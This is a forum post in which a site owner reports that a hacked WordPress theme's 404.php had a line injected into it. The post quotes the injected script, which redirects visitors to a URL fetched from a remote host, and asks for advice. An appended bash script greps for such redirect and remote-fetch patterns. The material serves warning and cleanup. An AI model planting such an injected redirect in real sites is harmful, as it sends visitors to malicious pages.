404.php theme hacked – any advice?
Hello people.
I am writing this in order to
1) warn other people.
2) help people who might have got this hack
3) get more tips from more knowledgeable people than me
I entered into one of my sites today and my AVAST antivirus warned me against a Trojan Horse (JS:ScriptIP-inf [Trj])
That was located inside my theme image files, two of them:
1) images/ico-catlist.gif\{gzip}
2) images/ico-arrow.gif\{gzip}
I searched for them in the source code of the site but couldn’t find them.
I then went to the server and didn’t see any changes in those files.
I then looked for any changes made to any of the files on the site.
I found that the 404.php file was changed today.
After opening it I found it had the following code added to the beginning of it (just before the “<?php get_header(); ?>”):
<script>location='https://scan.<?php echo file_get_contents('https:// borntobebest . biz/actual_domain.txt'); ?>/vista1/6/48017/';</script>
(I added spaces in the URL, just to be on the safe side)
I erased the extra line and the site stopped giving Trojan warnings.
Here are my questions:
1) My theme directory was CHMOD 775, I changed it to 555 – will this help in the future?
2) Why did my homepage suffer from a code injection in the 404.php? Isn’t the 404.php file activated only when the page is not found?
Any thoughts will be warmly welcomed.
Tal
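A triage sketch for the situation described in the post above, as an added example that is not part of the original post: it lists theme PHP files changed in the last day, flags lines with the two traits of the injected line (a script that sets location, and file_get_contents() fetching a remote URL), and reports paths writable by group or others. The function names, the grep patterns, the script name and the one-day default are assumptions.

```bash
#!/usr/bin/env bash
# Added example, not from the original post. Patterns and defaults are assumptions.

# List PHP files under theme dir $1 modified within the last $2 days (default 1).
recently_modified() {
    find "$1" -type f -name '*.php' -mtime "-${2:-1}" -print | sort
}

# Print "file:line:text" for PHP lines showing either trait of the injected line:
#   - a <script> block that assigns to location (client-side redirect)
#   - file_get_contents() fetching a remote http(s) URL
suspicious_lines() {
    grep -rnE --include='*.php' \
        -e '<script[^>]*>[[:space:]]*(window\.|document\.)?location[[:space:]]*=' \
        -e 'file_get_contents[[:space:]]*\([^)]*https?://' \
        "$1" || true
}

# List files and directories under $1 that group or others can write to.
# Symlinks are skipped because their own mode bits are not meaningful.
group_or_world_writable() {
    find "$1" ! -type l \( -perm -g+w -o -perm -o+w \) -print | sort
}

# Run all three checks when called with a theme path (hypothetical names), e.g.
#   ./theme-triage.sh wp-content/themes/mytheme 2
if [ "$#" -gt 0 ]; then
    echo "== PHP files modified in the last ${2:-1} day(s)"
    recently_modified "$1" "${2:-1}"
    echo "== Lines with a location redirect or a remote file_get_contents()"
    suspicious_lines "$1"
    echo "== Paths writable by group or others"
    group_or_world_writable "$1"
fi
```

A match is a lead for manual review, not proof of compromise, since legitimate theme code can also fetch remote URLs.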